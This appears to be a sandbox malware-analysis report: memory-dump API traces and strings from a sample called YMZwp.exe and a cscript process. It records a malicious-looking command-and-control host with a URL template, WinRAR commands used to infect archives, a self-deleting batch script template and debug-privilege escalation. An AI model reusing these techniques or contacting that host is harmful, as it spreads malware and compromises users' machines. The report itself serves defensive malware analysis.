                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                    • API String ID: 75692138-3918798735
                                    • Opcode ID: 3484c0dcfcf3e05d518337180adfd0ecd1573be15d704b3d464195f4f7e32000
                                    • Instruction ID: c4c59f71d4a5d6ce3fdc7b4c2ccb26dfc0f5e49cd8ab74cca6ad7453c242626d
                                    • Opcode Fuzzy Hash: 3484c0dcfcf3e05d518337180adfd0ecd1573be15d704b3d464195f4f7e32000
                                    • Instruction Fuzzy Hash: 1101E4B5900209EFEB00DFE8CD89AAFBBF8FB04705F204569E606A2250DB719F449B50
                                    APIs
                                    • strstr.MSVCRT ref: 00B323CC
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B32464
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00B32472
                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00B324A8
                                    • memset.MSVCRT ref: 00B324B9
                                    • strrchr.MSVCRT ref: 00B324C9
                                    • wsprintfA.USER32 ref: 00B324DE
                                    • strrchr.MSVCRT ref: 00B324ED
                                    • memset.MSVCRT ref: 00B324F2
                                    • memset.MSVCRT ref: 00B32505
                                    • wsprintfA.USER32 ref: 00B32524
                                    • Sleep.KERNEL32(000007D0), ref: 00B32535
                                    • Sleep.KERNEL32(000007D0), ref: 00B3255D
                                    • memset.MSVCRT ref: 00B3256E
                                    • wsprintfA.USER32 ref: 00B32585
                                    • memset.MSVCRT ref: 00B325A6
                                    • wsprintfA.USER32 ref: 00B325CA
                                    • Sleep.KERNEL32(000007D0), ref: 00B325D0
                                    • Sleep.KERNEL32(000007D0,?,?), ref: 00B325E5
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B325FC
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00B32611
                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00B32642
                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00B3265B
                                    • SetEndOfFile.KERNEL32 ref: 00B3266D
                                    • CloseHandle.KERNEL32(00000000), ref: 00B32676
                                    • RemoveDirectoryA.KERNEL32(?), ref: 00B32681
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 2203340711-4019750759
                                    • Opcode ID: 47684c2fc0c25a3f07ca0ea0991814e2f79832c9baebeff00e9bb8b16c386586
                                    • Instruction ID: 9120f300814d5ee930273a25c0420275b77f49b3ccb11f26f6ea0566a6725890
                                    • Opcode Fuzzy Hash: 47684c2fc0c25a3f07ca0ea0991814e2f79832c9baebeff00e9bb8b16c386586
                                    • Instruction Fuzzy Hash: 8481A1B1504304ABD7109F64DC85FAF77ECEF84B05F20095AFA44D31A0DB74EA498B66
                                    APIs
                                    • memset.MSVCRT ref: 00B32766
                                    • memset.MSVCRT ref: 00B32774
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00B32787
                                    • wsprintfA.USER32 ref: 00B327AB
                                      • Part of subcall function 00B3185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31878
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31880
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31890
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31894
                                    • wsprintfA.USER32 ref: 00B327C6
                                    • CopyFileA.KERNEL32(?,00B34C80,00000000), ref: 00B327D4
                                    • wsprintfA.USER32 ref: 00B327F4
                                      • Part of subcall function 00B31973: PathFileExistsA.SHLWAPI(00B34E5C,00000000,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31992
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(00B34E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00B319BA
                                      • Part of subcall function 00B31973: Sleep.KERNEL32(00000064), ref: 00B319C6
                                      • Part of subcall function 00B31973: wsprintfA.USER32 ref: 00B319EC
                                      • Part of subcall function 00B31973: CopyFileA.KERNEL32(00B34E5C,?,00000000), ref: 00B31A00
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B31A1E
                                      • Part of subcall function 00B31973: GetFileSize.KERNEL32(00B34E5C,00000000), ref: 00B31A2C
                                      • Part of subcall function 00B31973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00B31A46
                                      • Part of subcall function 00B31973: ReadFile.KERNEL32(00B34E5C,00B34E60,00000000,?,00000000), ref: 00B31A65
                                    • DeleteFileA.KERNEL32(?,?,00B34E54,00B34E58), ref: 00B3281A
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00B34E54,00B34E58), ref: 00B32832
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                    • API String ID: 692489704-1525515996
                                    • Opcode ID: 2b68c97a79feeee3ec2cc8d22ce815103655b97bc200f2bd7633fe452ddff748
                                    • Instruction ID: d99d6070f177e5e1a746b2880bebf2f11640973c9559fd55cb99d4ca2d77533f
                                    • Opcode Fuzzy Hash: 2b68c97a79feeee3ec2cc8d22ce815103655b97bc200f2bd7633fe452ddff748
                                    • Instruction Fuzzy Hash: 4A2154B694021C7BDB10E7A49C89FDB77ECEB04B44F5005E1B644E3051E674EF848AA0
                                    APIs
                                      • Part of subcall function 00B3185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31878
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31880
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31890
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31894
                                    • wsprintfA.USER32 ref: 00B315AA
                                    • wsprintfA.USER32 ref: 00B315C6
                                    • lstrlen.KERNEL32(?), ref: 00B315D2
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00B315EE
                                    • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00B31609
                                    • CloseHandle.KERNEL32(00000000), ref: 00B31612
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00B3162D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\YMZwp.exe$open
                                    • API String ID: 617340118-2860072701
                                    • Opcode ID: 0ce8669ee8f7d590e69fb6cbff17bd899a705972957cd34d31ccf9b4857c000a
                                    • Instruction ID: 20d827a87aee666583d98f4a879712efc242ae749d1cdae51a439876306bdef6
                                    • Opcode Fuzzy Hash: 0ce8669ee8f7d590e69fb6cbff17bd899a705972957cd34d31ccf9b4857c000a
                                    • Instruction Fuzzy Hash: D5115176A011287AD72097A59C89EEF7BECDF59B61F100491F549E3050EE749B84CBB0
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00B31400), ref: 00B31226
                                    • GetProcAddress.KERNEL32(00000000), ref: 00B3122D
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00B31400), ref: 00B3123F
                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00B31400), ref: 00B31250
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,00B31400), ref: 00B3129E
                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,00B31400), ref: 00B312B0
                                    • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,00B31400), ref: 00B312F5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00B31400), ref: 00B3130A
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B31262
                                    • ZwQuerySystemInformation, xrefs: 00B31212
                                    • ntdll.dll, xrefs: 00B31219
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe$ZwQuerySystemInformation$ntdll.dll
                                    • API String ID: 1500695312-1620186553
                                    • Opcode ID: 17668496ca75679168f2ef5af2eed5c71dec5e9ccdf62c4787d05c54509b8cf6
                                    • Instruction ID: b54f6dc89bd7d0aaba94c7135981fb09364aaeb57f15271ade61a96ddb4bf027
                                    • Opcode Fuzzy Hash: 17668496ca75679168f2ef5af2eed5c71dec5e9ccdf62c4787d05c54509b8cf6
                                    • Instruction Fuzzy Hash: 3D21CE71605311BBD7209B69CC48BAFBAECFB85F01F200D68F645E7280CB70DA8487A5
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                    • srand.MSVCRT ref: 00B31878
                                    • rand.MSVCRT ref: 00B31880
                                    • srand.MSVCRT ref: 00B31890
                                    • rand.MSVCRT ref: 00B31894
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Timerandsrand$FileSystem
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 4106363736-3273462101
                                    • Opcode ID: 85b0085b10a0c03c13f066eb159bd997b6b5f01893f35bf5c89e634dc162be85
                                    • Instruction ID: 00d7d1f8d5215d63ebedf65b0fee454e1af7e847d927bed5edce5229ed4d2417
                                    • Opcode Fuzzy Hash: 85b0085b10a0c03c13f066eb159bd997b6b5f01893f35bf5c89e634dc162be85
                                    • Instruction Fuzzy Hash: D1E0D877A00218BBD704A7F9EC46D9FBBECDE84561B200527F600D3250E971FD448AB4
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,76F8E800,?,?,00B329DB,?,00000001), ref: 00B326A7
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,76F8E800,?,?,00B329DB,?,00000001), ref: 00B326B5
                                    • lstrlen.KERNEL32(?), ref: 00B326C4
                                    • ??2@YAPAXI@Z.MSVCRT ref: 00B326CE
                                    • lstrcpy.KERNEL32(00000004,?), ref: 00B326E3
                                    • lstrcpy.KERNEL32(?,00000004), ref: 00B3271F
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00B3272D
                                    • SetEvent.KERNEL32 ref: 00B3273C
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                    • String ID:
                                    • API String ID: 41106472-0
                                    APIs
                                    Strings
                                    • .exe, xrefs: 00B31C57
                                    • QsuwNenTLwkroUESmisHTgKakCflhFwsygbcogWnqIMXhHirhOtjzZAKVducLHBOzAjvKXxZFVtNPqlRmufUXBIzGbafkDGDravOyCQeJimMyWAdEJPcEYpRYFoxUTBeGSbdJPlvRYnDCVqSQxZMtpIpNLjW, xrefs: 00B31B8A, 00B31B9C, 00B31C15, 00B31C49
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: lstrcatmemcpymemsetrandsrand
                                    • String ID: .exe$QsuwNenTLwkroUESmisHTgKakCflhFwsygbcogWnqIMXhHirhOtjzZAKVducLHBOzAjvKXxZFVtNPqlRmufUXBIzGbafkDGDravOyCQeJimMyWAdEJPcEYpRYFoxUTBeGSbdJPlvRYnDCVqSQxZMtpIpNLjW
                                    • API String ID: 122620767-2651133296
                                    APIs
                                    • memset.MSVCRT ref: 00B318B1
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76F90F00,753C8400), ref: 00B318D3
                                    • CloseHandle.KERNEL32(00B32549), ref: 00B318E9
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B318F0
                                    • GetExitCodeProcess.KERNEL32(?,00B32549), ref: 00B31901
                                    • CloseHandle.KERNEL32(?), ref: 00B3190A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                    • String ID:
                                    • API String ID: 876959470-0
                                    APIs
                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B313BC
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B313DA
                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B31448
                                      • Part of subcall function 00B3119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,?,?,00B313EF), ref: 00B311AB
                                      • Part of subcall function 00B3119F: OpenProcessToken.ADVAPI32(00000000,00000028,00B313EF,?,?,?,?,?,?,00B313EF), ref: 00B311BB
                                      • Part of subcall function 00B3119F: AdjustTokenPrivileges.ADVAPI32(00B313EF,00000000,?,00000010,00000000,00000000), ref: 00B311EB
                                      • Part of subcall function 00B3119F: CloseHandle.KERNEL32(00B313EF), ref: 00B311FA
                                      • Part of subcall function 00B3119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B313EF), ref: 00B31203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B313A8
                                    • SeDebugPrivilege, xrefs: 00B313D3
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe$SeDebugPrivilege
                                    • API String ID: 4123949106-3791149553
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00B31334
                                    • GetProcAddress.KERNEL32(00000000), ref: 00B3133B
                                    • memset.MSVCRT ref: 00B31359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcmemset
                                    • String ID: NtSystemDebugControl$ntdll.dll
                                    • API String ID: 3137504439-2438149413
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3636361484-0
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B3603C
                                    • GetProcAddress.KERNEL32(00000000,00B36064), ref: 00B3604F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: kernel32.dll
                                    • API String ID: 1646373207-1793498882
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000027.00000002.3810643262.0000000004980000.00000040.00000001.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_39_2_4980000_cscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns0$open$purity_control_90833
                                    • API String ID: 0-1416619028
                                    Memory Dump Source
                                    • Source File: 00000027.00000002.3810643262.0000000004980000.00000040.00000001.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_39_2_4980000_cscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000027.00000002.3810643262.0000000004980000.00000040.00000001.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_39_2_4980000_cscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                    • API String ID: 0-1163154406